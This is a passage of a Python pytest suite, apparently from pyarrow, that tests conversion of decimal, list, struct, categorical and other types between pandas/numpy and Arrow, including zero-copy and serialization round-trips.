        converted = pa.array(arr, type=pa.binary(3), mask=mask)
        expected = pa.array([b'foo', None, b'baz'], type=pa.binary(3))
        assert converted.equals(expected)

        # Length mismatch between the numpy itemsize and the Arrow
        # fixed-size binary width must raise.
        with pytest.raises(pa.lib.ArrowInvalid,
                           match=r'Got bytestring of length 3 \(expected 4\)'):
            arr = np.array([b'foo', b'bar', b'baz'], dtype='|S3')
            pa.array(arr, type=pa.binary(4))

        # '|U3' is 4-byte unicode, hence length 12 per element.
        with pytest.raises(
                pa.lib.ArrowInvalid,
                match=r'Got bytestring of length 12 \(expected 3\)'):
            arr = np.array([b'foo', b'bar', b'baz'], dtype='|U3')
            pa.array(arr, type=pa.binary(3))
class TestConvertDecimalTypes(object):
    """
    Conversion test for decimal types.
    """
    # Sample values sized to exercise increasing precision requirements.
    decimal32 = [
        decimal.Decimal('-1234.123'),
        decimal.Decimal('1234.439')
    ]
    decimal64 = [
        decimal.Decimal('-129934.123331'),
        decimal.Decimal('129534.123731')
    ]
    decimal128 = [
        decimal.Decimal('394092382910493.12341234678'),
        decimal.Decimal('-314292388910493.12343437128')
    ]

    @pytest.mark.parametrize(('values', 'expected_type'), [
        pytest.param(decimal32, pa.decimal128(7, 3), id='decimal32'),
        pytest.param(decimal64, pa.decimal128(12, 6), id='decimal64'),
        pytest.param(decimal128, pa.decimal128(26, 11), id='decimal128')
    ])
    def test_decimal_from_pandas(self, values, expected_type):
        # Precision/scale should be inferred from the Decimal values.
        expected = pd.DataFrame({'decimals': values})
        table = pa.Table.from_pandas(expected, preserve_index=False)
        field = pa.field('decimals', expected_type)

        # schema's metadata is generated by from_pandas conversion
        expected_schema = pa.schema([field], metadata=table.schema.metadata)
        assert table.schema.equals(expected_schema)

    @pytest.mark.parametrize('values', [
        pytest.param(decimal32, id='decimal32'),
        pytest.param(decimal64, id='decimal64'),
        pytest.param(decimal128, id='decimal128')
    ])
    def test_decimal_to_pandas(self, values):
        expected = pd.DataFrame({'decimals': values})
        converted = pa.Table.from_pandas(expected)
        df = converted.to_pandas()
        tm.assert_frame_equal(df, expected)

    def test_decimal_fails_with_truncation(self):
        # Converting to a scale that would drop digits must raise.
        data1 = [decimal.Decimal('1.234')]
        type1 = pa.decimal128(10, 2)
        with pytest.raises(pa.ArrowInvalid):
            pa.array(data1, type=type1)

        data2 = [decimal.Decimal('1.2345')]
        type2 = pa.decimal128(10, 3)
        with pytest.raises(pa.ArrowInvalid):
            pa.array(data2, type=type2)

    def test_decimal_with_different_precisions(self):
        data = [
            decimal.Decimal('0.01'),
            decimal.Decimal('0.001'),
        ]
        series = pd.Series(data)
        array = pa.array(series)
        assert array.to_pylist() == data
        assert array.type == pa.decimal128(3, 3)

        # An explicit type rescales all values to the requested scale.
        array = pa.array(data, type=pa.decimal128(12, 5))
        expected = [decimal.Decimal('0.01000'), decimal.Decimal('0.00100')]
        assert array.to_pylist() == expected

    def test_decimal_with_None_explicit_type(self):
        series = pd.Series([decimal.Decimal('3.14'), None])
        _check_series_roundtrip(series, type_=pa.decimal128(12, 5))

        # Test that having all None values still produces decimal array
        series = pd.Series([None] * 2)
        _check_series_roundtrip(series, type_=pa.decimal128(12, 5))

    def test_decimal_with_None_infer_type(self):
        series = pd.Series([decimal.Decimal('3.14'), None])
        _check_series_roundtrip(series, expected_pa_type=pa.decimal128(3, 2))

    def test_strided_objects(self, tmpdir):
        # see ARROW-3053
        data = {
            'a': {0: 'a'},
            'b': {0: decimal.Decimal('0.0')}
        }

        # This yields strided objects
        df = pd.DataFrame.from_dict(data)
        _check_pandas_roundtrip(df)
class TestConvertListTypes(object):
    """
    Conversion tests for list<> types.
    """

    def test_column_of_arrays(self):
        df, schema = dataframe_with_arrays()
        _check_pandas_roundtrip(df, schema=schema, expected_schema=schema)
        table = pa.Table.from_pandas(df, schema=schema, preserve_index=False)

        # schema's metadata is generated by from_pandas conversion
        expected_schema = schema.with_metadata(table.schema.metadata)
        assert table.schema.equals(expected_schema)

        for column in df.columns:
            field = schema.field(column)
            _check_array_roundtrip(df[column], type=field.type)

    def test_column_of_arrays_to_py(self):
        # Test regression in ARROW-1199 not caught in above test
        dtype = 'i1'
        arr = np.array([
            np.arange(10, dtype=dtype),
            np.arange(5, dtype=dtype),
            None,
            np.arange(1, dtype=dtype)
        ])
        type_ = pa.list_(pa.int8())
        parr = pa.array(arr, type=type_)

        assert parr[0].as_py() == list(range(10))
        assert parr[1].as_py() == list(range(5))
        assert parr[2].as_py() is None
        assert parr[3].as_py() == [0]

    def test_column_of_boolean_list(self):
        # ARROW-4370: Table to pandas conversion fails for list of bool
        array = pa.array([[True, False], [True]], type=pa.list_(pa.bool_()))
        table = pa.Table.from_arrays([array], names=['col1'])
        df = table.to_pandas()

        expected_df = pd.DataFrame({'col1': [[True, False], [True]]})
        tm.assert_frame_equal(df, expected_df)

        s = table[0].to_pandas()
        tm.assert_series_equal(pd.Series(s), df['col1'], check_names=False)

    def test_column_of_decimal_list(self):
        array = pa.array([[decimal.Decimal('1'), decimal.Decimal('2')],
                          [decimal.Decimal('3.3')]],
                         type=pa.list_(pa.decimal128(2, 1)))
        table = pa.Table.from_arrays([array], names=['col1'])
        df = table.to_pandas()

        expected_df = pd.DataFrame(
            {'col1': [[decimal.Decimal('1'), decimal.Decimal('2')],
                      [decimal.Decimal('3.3')]]})
        tm.assert_frame_equal(df, expected_df)

    def test_nested_types_from_ndarray_null_entries(self):
        # Root cause of ARROW-6435: all-NaN object Series to nested types.
        s = pd.Series(np.array([np.nan, np.nan], dtype=object))

        for ty in [pa.list_(pa.int64()),
                   pa.large_list(pa.int64()),
                   pa.struct([pa.field('f0', 'int32')])]:
            result = pa.array(s, type=ty)
            expected = pa.array([None, None], type=ty)
            assert result.equals(expected)

            # The raw ndarray (without pandas null semantics) must fail.
            with pytest.raises(TypeError):
                pa.array(s.values, type=ty)

    def test_column_of_lists(self):
        df, schema = dataframe_with_lists()
        _check_pandas_roundtrip(df, schema=schema, expected_schema=schema)
        table = pa.Table.from_pandas(df, schema=schema, preserve_index=False)

        # schema's metadata is generated by from_pandas conversion
        expected_schema = schema.with_metadata(table.schema.metadata)
        assert table.schema.equals(expected_schema)

        for column in df.columns:
            field = schema.field(column)
            _check_array_roundtrip(df[column], type=field.type)

    def test_column_of_lists_first_empty(self):
        # ARROW-2124
        num_lists = [[], [2, 3, 4], [3, 6, 7, 8], [], [2]]
        series = pd.Series([np.array(s, dtype=float) for s in num_lists])
        arr = pa.array(series)
        result = pd.Series(arr.to_pandas())
        tm.assert_series_equal(result, series)

    def test_column_of_lists_chunked(self):
        # ARROW-1357
        df = pd.DataFrame({
            'lists': np.array([
                [1, 2],
                None,
                [2, 3],
                [4, 5],
                [6, 7],
                [8, 9]
            ], dtype=object)
        })

        schema = pa.schema([
            pa.field('lists', pa.list_(pa.int64()))
        ])

        t1 = pa.Table.from_pandas(df[:2], schema=schema)
        t2 = pa.Table.from_pandas(df[2:], schema=schema)

        table = pa.concat_tables([t1, t2])
        result = table.to_pandas()

        tm.assert_frame_equal(result, df)

    def test_empty_column_of_lists_chunked(self):
        df = pd.DataFrame({
            'lists': np.array([], dtype=object)
        })

        schema = pa.schema([
            pa.field('lists', pa.list_(pa.int64()))
        ])

        table = pa.Table.from_pandas(df, schema=schema)
        result = table.to_pandas()

        tm.assert_frame_equal(result, df)

    def test_column_of_lists_chunked2(self):
        data1 = [[0, 1], [2, 3], [4, 5], [6, 7], [10, 11],
                 [12, 13], [14, 15], [16, 17]]
        data2 = [[8, 9], [18, 19]]

        a1 = pa.array(data1)
        a2 = pa.array(data2)

        t1 = pa.Table.from_arrays([a1], names=['a'])
        t2 = pa.Table.from_arrays([a2], names=['a'])

        concatenated = pa.concat_tables([t1, t2])

        result = concatenated.to_pandas()
        expected = pd.DataFrame({'a': data1 + data2})

        tm.assert_frame_equal(result, expected)

    def test_column_of_lists_strided(self):
        df, schema = dataframe_with_lists()
        df = pd.concat([df] * 6, ignore_index=True)

        # Take every third element to get a non-contiguous object array.
        arr = df['int64'].values[::3]
        assert arr.strides[0] != 8

        _check_array_roundtrip(arr)

    def test_nested_lists_all_none(self):
        data = np.array([[None, None], None], dtype=object)

        arr = pa.array(data)
        expected = pa.array(list(data))
        assert arr.equals(expected)
        assert arr.type == pa.list_(pa.null())

        data2 = np.array([None, None, [None, None],
                          np.array([None, None], dtype=object)],
                         dtype=object)
        arr = pa.array(data2)
        expected = pa.array([None, None, [None, None], [None, None]])
        assert arr.equals(expected)

    def test_nested_lists_all_empty(self):
        # ARROW-2128
        data = pd.Series([[], [], []])
        arr = pa.array(data)
        expected = pa.array(list(data))
        assert arr.equals(expected)
        assert arr.type == pa.list_(pa.null())

    def test_nested_list_first_empty(self):
        # ARROW-2711
        data = pd.Series([[], [u"a"]])
        arr = pa.array(data)
        expected = pa.array(list(data))
        assert arr.equals(expected)
        assert arr.type == pa.list_(pa.string())

    def test_nested_smaller_ints(self):
        # ARROW-1345, ARROW-2008, there were some type inference bugs happening
        # before
        data = pd.Series([np.array([1, 2, 3], dtype='i1'), None])
        result = pa.array(data)
        result2 = pa.array(data.values)
        expected = pa.array([[1, 2, 3], None], type=pa.list_(pa.int8()))
        assert result.equals(expected)
        assert result2.equals(expected)

        data3 = pd.Series([np.array([1, 2, 3], dtype='f4'), None])
        result3 = pa.array(data3)
        expected3 = pa.array([[1, 2, 3], None], type=pa.list_(pa.float32()))
        assert result3.equals(expected3)

    def test_infer_lists(self):
        data = OrderedDict([
            ('nan_ints', [[None, 1], [2, 3]]),
            ('ints', [[0, 1], [2, 3]]),
            ('strs', [[None, u'b'], [u'c', u'd']]),
            ('nested_strs', [[[None, u'b'], [u'c', u'd']], None])
        ])
        df = pd.DataFrame(data)

        expected_schema = pa.schema([
            pa.field('nan_ints', pa.list_(pa.int64())),
            pa.field('ints', pa.list_(pa.int64())),
            pa.field('strs', pa.list_(pa.string())),
            pa.field('nested_strs', pa.list_(pa.list_(pa.string())))
        ])

        _check_pandas_roundtrip(df, expected_schema=expected_schema)

    def test_infer_numpy_array(self):
        data = OrderedDict([
            ('ints', [
                np.array([0, 1], dtype=np.int64),
                np.array([2, 3], dtype=np.int64)
            ])
        ])
        df = pd.DataFrame(data)
        expected_schema = pa.schema([
            pa.field('ints', pa.list_(pa.int64()))
        ])

        _check_pandas_roundtrip(df, expected_schema=expected_schema)

    @pytest.mark.parametrize('t,data,expected', [
        (
            pa.int64,
            [[1, 2], [3], None],
            [None, [3], None]
        ),
        (
            pa.string,
            [[u'aaa', u'bb'], [u'c'], None],
            [None, [u'c'], None]
        ),
        (
            pa.null,
            [[None, None], [None], None],
            [None, [None], None]
        )
    ])
    def test_array_from_pandas_typed_array_with_mask(self, t, data, expected):
        # True entries in the mask become nulls in the resulting array.
        m = np.array([True, False, True])

        s = pd.Series(data)
        result = pa.Array.from_pandas(s, mask=m, type=pa.list_(t()))

        assert pa.Array.from_pandas(expected,
                                    type=pa.list_(t())).equals(result)

    def test_empty_list_roundtrip(self):
        empty_list_array = np.empty((3,), dtype=object)
        empty_list_array.fill([])

        df = pd.DataFrame({'a': np.array(['1', '2', '3']),
                           'b': empty_list_array})
        tbl = pa.Table.from_pandas(df)

        result = tbl.to_pandas()

        tm.assert_frame_equal(result, df)

    def test_array_from_nested_arrays(self):
        df, schema = dataframe_with_arrays()
        for field in schema:
            arr = df[field.name].values
            expected = pa.array(list(arr), type=field.type)
            result = pa.array(arr)
            assert result.type == field.type  # == list<scalar>
            assert result.equals(expected)
class TestConvertStructTypes(object):
    """
    Conversion tests for struct types.
    """

    def test_pandas_roundtrip(self):
        df = pd.DataFrame({'dicts': [{'a': 1, 'b': 2}, {'a': 3, 'b': 4}]})

        expected_schema = pa.schema([
            ('dicts', pa.struct([('a', pa.int64()), ('b', pa.int64())])),
        ])

        _check_pandas_roundtrip(df, expected_schema=expected_schema)

        # specifying schema explicitly in from_pandas
        _check_pandas_roundtrip(
            df, schema=expected_schema, expected_schema=expected_schema)

    def test_to_pandas(self):
        # Structs become a Series of dicts; child nulls become None values.
        ints = pa.array([None, 2, 3], type=pa.int64())
        strs = pa.array([u'a', None, u'c'], type=pa.string())
        bools = pa.array([True, False, None], type=pa.bool_())
        arr = pa.StructArray.from_arrays(
            [ints, strs, bools],
            ['ints', 'strs', 'bools'])

        expected = pd.Series([
            {'ints': None, 'strs': u'a', 'bools': True},
            {'ints': 2, 'strs': None, 'bools': False},
            {'ints': 3, 'strs': u'c', 'bools': None},
        ])

        series = pd.Series(arr.to_pandas())
        tm.assert_series_equal(series, expected)

    def test_from_numpy(self):
        # (('y_title', 'y'), ...) gives the field a title plus name 'y'.
        dt = np.dtype([('x', np.int32),
                       (('y_title', 'y'), np.bool_)])
        ty = pa.struct([pa.field('x', pa.int32()),
                        pa.field('y', pa.bool_())])

        data = np.array([], dtype=dt)
        arr = pa.array(data, type=ty)
        assert arr.to_pylist() == []

        data = np.array([(42, True), (43, False)], dtype=dt)
        arr = pa.array(data, type=ty)
        assert arr.to_pylist() == [{'x': 42, 'y': True},
                                   {'x': 43, 'y': False}]

        # With mask
        arr = pa.array(data, mask=np.bool_([False, True]), type=ty)
        assert arr.to_pylist() == [{'x': 42, 'y': True}, None]

        # Trivial struct type
        dt = np.dtype([])
        ty = pa.struct([])

        data = np.array([], dtype=dt)
        arr = pa.array(data, type=ty)
        assert arr.to_pylist() == []

        data = np.array([(), ()], dtype=dt)
        arr = pa.array(data, type=ty)
        assert arr.to_pylist() == [{}, {}]

    def test_from_numpy_nested(self):
        # Note: an object field inside a struct
        dt = np.dtype([('x', np.dtype([('xx', np.int8),
                                       ('yy', np.bool_)])),
                       ('y', np.int16),
                       ('z', np.object_)])
        # Note: itemsize is not a multiple of sizeof(object)
        assert dt.itemsize == 12
        ty = pa.struct([pa.field('x', pa.struct([pa.field('xx', pa.int8()),
                                                 pa.field('yy', pa.bool_())])),
                        pa.field('y', pa.int16()),
                        pa.field('z', pa.string())])

        data = np.array([], dtype=dt)
        arr = pa.array(data, type=ty)
        assert arr.to_pylist() == []

        data = np.array([
            ((1, True), 2, 'foo'),
            ((3, False), 4, 'bar')], dtype=dt)
        arr = pa.array(data, type=ty)
        assert arr.to_pylist() == [
            {'x': {'xx': 1, 'yy': True}, 'y': 2, 'z': 'foo'},
            {'x': {'xx': 3, 'yy': False}, 'y': 4, 'z': 'bar'}]

    @pytest.mark.large_memory
    def test_from_numpy_large(self):
        # Exercise rechunking + nulls
        target_size = 3 * 1024**3  # 3GB
        dt = np.dtype([('x', np.float64), ('y', 'object')])
        bs = 65536 - dt.itemsize
        block = b'.' * bs
        n = target_size // (bs + dt.itemsize)
        data = np.zeros(n, dtype=dt)
        data['x'] = np.random.random_sample(n)
        data['y'] = block
        # Add implicit nulls
        data['x'][data['x'] < 0.2] = np.nan

        ty = pa.struct([pa.field('x', pa.float64()),
                        pa.field('y', pa.binary())])
        arr = pa.array(data, type=ty, from_pandas=True)
        assert arr.num_chunks == 2

        def iter_chunked_array(arr):
            # Flatten all chunks into a single item stream.
            for chunk in arr.iterchunks():
                for item in chunk:
                    yield item

        def check(arr, data, mask=None):
            # Compare every converted item against the source record,
            # honoring both the explicit mask and implicit NaN nulls.
            assert len(arr) == len(data)
            xs = data['x']
            ys = data['y']
            for i, obj in enumerate(iter_chunked_array(arr)):
                try:
                    d = obj.as_py()
                    if mask is not None and mask[i]:
                        assert d is None
                    else:
                        x = xs[i]
                        if np.isnan(x):
                            assert d['x'] is None
                        else:
                            assert d['x'] == x
                        assert d['y'] == ys[i]
                except Exception:
                    print("Failed at index", i)
                    raise

        check(arr, data)
        del arr  # release ~3GB before the second conversion

        # Now with explicit mask
        mask = np.random.random_sample(n) < 0.2
        arr = pa.array(data, type=ty, mask=mask, from_pandas=True)
        assert arr.num_chunks == 2

        check(arr, data, mask)
        del arr

    def test_from_numpy_bad_input(self):
        ty = pa.struct([pa.field('x', pa.int32()),
                        pa.field('y', pa.bool_())])
        dt = np.dtype([('x', np.int32),
                       ('z', np.bool_)])

        data = np.array([], dtype=dt)
        with pytest.raises(TypeError,
                           match="Missing field 'y'"):
            pa.array(data, type=ty)
        data = np.int32([])
        with pytest.raises(TypeError,
                           match="Expected struct array"):
            pa.array(data, type=ty)

    def test_from_tuples(self):
        df = pd.DataFrame({'tuples': [(1, 2), (3, 4)]})
        expected_df = pd.DataFrame(
            {'tuples': [{'a': 1, 'b': 2}, {'a': 3, 'b': 4}]})

        # conversion from tuples works when specifying expected struct type
        struct_type = pa.struct([('a', pa.int64()), ('b', pa.int64())])

        arr = np.asarray(df['tuples'])
        _check_array_roundtrip(
            arr, expected=expected_df['tuples'], type=struct_type)

        expected_schema = pa.schema([('tuples', struct_type)])
        _check_pandas_roundtrip(
            df, expected=expected_df, schema=expected_schema,
            expected_schema=expected_schema)
class TestZeroCopyConversion(object):
    """
    Tests that zero-copy conversion works with some types.
    """

    def test_zero_copy_success(self):
        result = pa.array([0, 1, 2]).to_pandas(zero_copy_only=True)
        npt.assert_array_equal(result, [0, 1, 2])

    def test_zero_copy_dictionaries(self):
        arr = pa.DictionaryArray.from_arrays(
            np.array([0, 0]),
            np.array([5]))

        result = arr.to_pandas(zero_copy_only=True)
        values = pd.Categorical([5, 5])

        tm.assert_series_equal(pd.Series(result), pd.Series(values),
                               check_names=False)

    def check_zero_copy_failure(self, arr):
        # Helper: these arrays require a copy, so zero_copy_only must raise.
        with pytest.raises(pa.ArrowInvalid):
            arr.to_pandas(zero_copy_only=True)

    def test_zero_copy_failure_on_object_types(self):
        self.check_zero_copy_failure(pa.array(['A', 'B', 'C']))

    def test_zero_copy_failure_with_int_when_nulls(self):
        self.check_zero_copy_failure(pa.array([0, 1, None]))

    def test_zero_copy_failure_with_float_when_nulls(self):
        self.check_zero_copy_failure(pa.array([0.0, 1.0, None]))

    def test_zero_copy_failure_on_bool_types(self):
        self.check_zero_copy_failure(pa.array([True, False]))

    def test_zero_copy_failure_on_list_types(self):
        arr = pa.array([[1, 2], [8, 9]], type=pa.list_(pa.int64()))
        self.check_zero_copy_failure(arr)

    def test_zero_copy_failure_on_timestamp_types(self):
        arr = np.array(['2007-07-13'], dtype='datetime64[ns]')
        self.check_zero_copy_failure(pa.array(arr))

    def test_zero_copy_failure_on_duration_types(self):
        arr = np.array([1], dtype='timedelta64[ns]')
        self.check_zero_copy_failure(pa.array(arr))
# This function must be at the top-level for Python 2.7's multiprocessing
def _non_threaded_conversion():
    """Roundtrip the all-types example frame with threading disabled."""
    frame = _alltypes_example()
    _check_pandas_roundtrip(frame, use_threads=False)
    _check_pandas_roundtrip(frame, use_threads=False, as_batch=True)
def _threaded_conversion():
    """Roundtrip the all-types example frame with threading enabled."""
    frame = _alltypes_example()
    _check_pandas_roundtrip(frame, use_threads=True)
    _check_pandas_roundtrip(frame, use_threads=True, as_batch=True)
class TestConvertMisc(object):
    """
    Miscellaneous conversion tests.
    """
    # (numpy dtype, Arrow type) pairs exercised by test_empty_arrays.
    type_pairs = [
        (np.int8, pa.int8()),
        (np.int16, pa.int16()),
        (np.int32, pa.int32()),
        (np.int64, pa.int64()),
        (np.uint8, pa.uint8()),
        (np.uint16, pa.uint16()),
        (np.uint32, pa.uint32()),
        (np.uint64, pa.uint64()),
        (np.float16, pa.float16()),
        (np.float32, pa.float32()),
        (np.float64, pa.float64()),
        # XXX unsupported
        # (np.dtype([('a', 'i2')]), pa.struct([pa.field('a', pa.int16())])),
        # NOTE(review): np.object is a deprecated alias for builtin `object`
        # in newer numpy releases — confirm before bumping numpy.
        (np.object, pa.string()),
        (np.object, pa.binary()),
        (np.object, pa.binary(10)),
        (np.object, pa.list_(pa.int64())),
    ]

    def test_all_none_objects(self):
        df = pd.DataFrame({'a': [None, None, None]})
        _check_pandas_roundtrip(df)

    def test_all_none_category(self):
        df = pd.DataFrame({'a': [None, None, None]})
        df['a'] = df['a'].astype('category')
        _check_pandas_roundtrip(df)

    def test_empty_arrays(self):
        # Every supported dtype must roundtrip even with zero elements.
        for dtype, pa_type in self.type_pairs:
            arr = np.array([], dtype=dtype)
            _check_array_roundtrip(arr, type=pa_type)

    def test_non_threaded_conversion(self):
        _non_threaded_conversion()

    def test_threaded_conversion_multiprocess(self):
        # Parallel conversion should work from child processes too (ARROW-2963)
        pool = mp.Pool(2)
        try:
            pool.apply(_threaded_conversion)
        finally:
            pool.close()
            pool.join()

    def test_category(self):
        repeats = 5
        v1 = ['foo', None, 'bar', 'qux', np.nan]
        v2 = [4, 5, 6, 7, 8]
        v3 = [b'foo', None, b'bar', b'qux', np.nan]

        arrays = {
            'cat_strings': pd.Categorical(v1 * repeats),
            'cat_strings_with_na': pd.Categorical(v1 * repeats,
                                                  categories=['foo', 'bar']),
            'cat_ints': pd.Categorical(v2 * repeats),
            'cat_binary': pd.Categorical(v3 * repeats),
            'cat_strings_ordered': pd.Categorical(
                v1 * repeats, categories=['bar', 'qux', 'foo'],
                ordered=True),
            'ints': v2 * repeats,
            'ints2': v2 * repeats,
            'strings': v1 * repeats,
            'strings2': v1 * repeats,
            'strings3': v3 * repeats}
        df = pd.DataFrame(arrays)
        _check_pandas_roundtrip(df)

        for k in arrays:
            _check_array_roundtrip(arrays[k])

    def test_category_implicit_from_pandas(self):
        # ARROW-3374
        def _check(v):
            arr = pa.array(v)
            result = arr.to_pandas()
            tm.assert_series_equal(pd.Series(result), pd.Series(v))

        arrays = [
            pd.Categorical(['a', 'b', 'c'], categories=['a', 'b']),
            pd.Categorical(['a', 'b', 'c'], categories=['a', 'b'],
                           ordered=True)
        ]
        for arr in arrays:
            _check(arr)

    def test_empty_category(self):
        # ARROW-2443
        df = pd.DataFrame({'cat': pd.Categorical([])})
        _check_pandas_roundtrip(df)

    def test_category_zero_chunks(self):
        # ARROW-5952: a chunked dictionary array with zero chunks must
        # still produce an (empty) Categorical with the right dtype.
        for pa_type, dtype in [(pa.string(), 'object'), (pa.int64(), 'int64')]:
            a = pa.chunked_array([], pa.dictionary(pa.int8(), pa_type))
            result = a.to_pandas()
            expected = pd.Categorical([], categories=np.array([], dtype=dtype))
            tm.assert_series_equal(pd.Series(result), pd.Series(expected))

            table = pa.table({'a': a})
            result = table.to_pandas()
            expected = pd.DataFrame({'a': expected})
            tm.assert_frame_equal(result, expected)

    def test_mixed_types_fails(self):
        data = pd.DataFrame({'a': ['a', 1, 2.0]})
        with pytest.raises(pa.ArrowTypeError):
            pa.Table.from_pandas(data)

        data = pd.DataFrame({'a': [1, True]})
        with pytest.raises(pa.ArrowTypeError):
            pa.Table.from_pandas(data)

        # The error message should name the offending column.
        data = pd.DataFrame({'a': ['a', 1, 2.0]})
        expected_msg = 'Conversion failed for column a'
        with pytest.raises(pa.ArrowTypeError, match=expected_msg):
            pa.Table.from_pandas(data)

    def test_strided_data_import(self):
        cases = []

        columns = ['a', 'b', 'c']
        N, K = 100, 3
        random_numbers = np.random.randn(N, K).copy() * 100

        numeric_dtypes = ['i1', 'i2', 'i4', 'i8', 'u1', 'u2', 'u4', 'u8',
                          'f4', 'f8']

        for type_name in numeric_dtypes:
            cases.append(random_numbers.astype(type_name))

        # strings
        cases.append(np.array([random_ascii(10) for i in range(N * K)],
                              dtype=object)
                     .reshape(N, K).copy())

        # booleans
        boolean_objects = (np.array([True, False, True] * N, dtype=object)
                           .reshape(N, K).copy())

        # add some nulls, so dtype comes back as objects
        boolean_objects[5] = None
        cases.append(boolean_objects)

        cases.append(np.arange("2016-01-01T00:00:00.001", N * K,
                               dtype='datetime64[ms]')
                     .reshape(N, K).copy())

        strided_mask = (random_numbers > 0).astype(bool)[:, 0]

        # Selecting one column of a 2D frame yields strided data.
        for case in cases:
            df = pd.DataFrame(case, columns=columns)
            col = df['a']

            _check_pandas_roundtrip(df)
            _check_array_roundtrip(col)
            _check_array_roundtrip(col, mask=strided_mask)

    def test_all_nones(self):
        def _check_series(s):
            converted = pa.array(s)
            assert isinstance(converted, pa.NullArray)
            assert len(converted) == 3
            assert converted.null_count == 3
            for item in converted:
                assert item is pa.NA

        _check_series(pd.Series([None] * 3, dtype=object))
        _check_series(pd.Series([np.nan] * 3, dtype=object))
        _check_series(pd.Series([None, np.nan, None], dtype=object))

    def test_partial_schema(self):
        # A schema naming a subset of columns selects and reorders them.
        data = OrderedDict([
            ('a', [0, 1, 2, 3, 4]),
            ('b', np.array([-10, -5, 0, 5, 10], dtype=np.int32)),
            ('c', [-10, -5, 0, 5, 10])
        ])
        df = pd.DataFrame(data)

        partial_schema = pa.schema([
            pa.field('c', pa.int64()),
            pa.field('a', pa.int64())
        ])

        _check_pandas_roundtrip(df, schema=partial_schema,
                                expected=df[['c', 'a']],
                                expected_schema=partial_schema)

    def test_table_batch_empty_dataframe(self):
        df = pd.DataFrame({})
        _check_pandas_roundtrip(df)
        _check_pandas_roundtrip(df, as_batch=True)

        # A zero-column frame may still carry an index.
        df2 = pd.DataFrame({}, index=[0, 1, 2])
        _check_pandas_roundtrip(df2, preserve_index=True)
        _check_pandas_roundtrip(df2, as_batch=True, preserve_index=True)

    def test_convert_empty_table(self):
        arr = pa.array([], type=pa.int64())
        empty_objects = pd.Series(np.array([], dtype=object))
        tm.assert_almost_equal(arr.to_pandas(),
                               pd.Series(np.array([], dtype=np.int64)))
        arr = pa.array([], type=pa.string())
        tm.assert_almost_equal(arr.to_pandas(), empty_objects)
        arr = pa.array([], type=pa.list_(pa.int64()))
        tm.assert_almost_equal(arr.to_pandas(), empty_objects)
        arr = pa.array([], type=pa.struct([pa.field('a', pa.int64())]))
        tm.assert_almost_equal(arr.to_pandas(), empty_objects)

    def test_non_natural_stride(self):
        """
        ARROW-2172: converting from a Numpy array with a stride that's
        not a multiple of itemsize.
        """
        dtype = np.dtype([('x', np.int32), ('y', np.int16)])
        data = np.array([(42, -1), (-43, 2)], dtype=dtype)
        assert data.strides == (6,)

        arr = pa.array(data['x'], type=pa.int32())
        assert arr.to_pylist() == [42, -43]

        arr = pa.array(data['y'], type=pa.int16())
        assert arr.to_pylist() == [-1, 2]

    def test_array_from_strided_numpy_array(self):
        # ARROW-5651
        np_arr = np.arange(0, 10, dtype=np.float32)[1:-1:2]
        pa_arr = pa.array(np_arr, type=pa.float64())
        expected = pa.array([1.0, 3.0, 5.0, 7.0], type=pa.float64())
        # BUG FIX: the equals() result was previously discarded, so this
        # test could never fail; assert it.
        assert pa_arr.equals(expected)

    def test_safe_unsafe_casts(self):
        # ARROW-2799: lossy float -> int casts raise unless safe=False.
        df = pd.DataFrame({
            'A': list('abc'),
            'B': np.linspace(0, 1, 3)
        })

        schema = pa.schema([
            pa.field('A', pa.string()),
            pa.field('B', pa.int32())
        ])

        with pytest.raises(ValueError):
            pa.Table.from_pandas(df, schema=schema)

        table = pa.Table.from_pandas(df, schema=schema, safe=False)
        assert table.column('B').type == pa.int32()

    def test_error_sparse(self):
        # ARROW-2818
        # NOTE(review): pd.SparseArray was removed in pandas >= 1.0 —
        # confirm the pinned pandas version before upgrading.
        df = pd.DataFrame({'a': pd.SparseArray([1, np.nan, 3])})
        with pytest.raises(TypeError, match="Sparse pandas data"):
            pa.Table.from_pandas(df)
def test_safe_cast_from_float_with_nans_to_int():
    """A float Series whose only 'lossiness' is NaN casts safely to int."""
    # TODO(kszucs): write tests for creating Date32 and Date64 arrays, see
    # ARROW-4258 and https://github.com/apache/arrow/pull/3395
    series = pd.Series([1, 2, None, 4])
    result = pa.Array.from_pandas(series, type=pa.int32(), safe=True)
    assert result.equals(pa.array([1, 2, None, 4], type=pa.int32()))
def _fully_loaded_dataframe_example():
    """Build a DataFrame exercising many dtypes on a MultiIndex.

    Columns cover naive/UTC/US-Eastern datetimes, a datetime categorical,
    strings, a string categorical, booleans, floats, ints, periods and
    (on pandas >= 0.21) intervals. Float/int columns contain random data.
    """
    index = pd.MultiIndex.from_arrays([
        pd.date_range('2000-01-01', periods=5).repeat(2),
        np.tile(np.array(['foo', 'bar'], dtype=object), 5)
    ])

    c1 = pd.date_range('2000-01-01', periods=10)
    data = {
        0: c1,
        1: c1.tz_localize('utc'),
        2: c1.tz_localize('US/Eastern'),
        3: c1[::2].tz_localize('utc').repeat(2).astype('category'),
        4: ['foo', 'bar'] * 5,
        5: pd.Series(['foo', 'bar'] * 5).astype('category').values,
        6: [True, False] * 5,
        7: np.random.randn(10),
        8: np.random.randint(0, 100, size=10),
        9: pd.period_range('2013', periods=10, freq='M')
    }

    if LooseVersion(pd.__version__) >= '0.21':
        # There is an issue with pickling IntervalIndex in pandas 0.20.x
        data[10] = pd.interval_range(start=1, freq=1, periods=10)

    return pd.DataFrame(data, index=index)
@pytest.mark.parametrize('columns', ([b'foo'], ['foo']))
def test_roundtrip_with_bytes_unicode(columns):
    """Bytes and unicode column labels must survive a
    pandas -> Arrow -> pandas -> Arrow round trip unchanged."""
    original = pd.DataFrame(columns=columns)
    first = pa.Table.from_pandas(original)
    second = pa.Table.from_pandas(first.to_pandas())
    assert first.equals(second)
    assert first.schema.equals(second.schema)
    assert first.schema.metadata == second.schema.metadata
def _check_serialize_components_roundtrip(df):
    """Serialize *df* to raw components, rebuild it, and require frame
    equality with the original."""
    context = pa.default_serialization_context()
    payload = context.serialize(df).to_components()
    restored = context.deserialize_components(payload)
    tm.assert_frame_equal(df, restored)
# BUG FIX: the skip threshold was '0.16', which every modern numpy (1.x)
# satisfies, so the test was unconditionally skipped. numpy/numpy#12745 is
# a numpy 1.16 regression, so 1.16 is the intended cutoff.
@pytest.mark.skipif(LooseVersion(np.__version__) >= '1.16',
                    reason='Until numpy/numpy#12745 is resolved')
def test_serialize_deserialize_pandas():
    """Round-trip a dtype-rich DataFrame through component serialization
    by decomposing its BlockManager (ARROW-1784)."""
    df = _fully_loaded_dataframe_example()
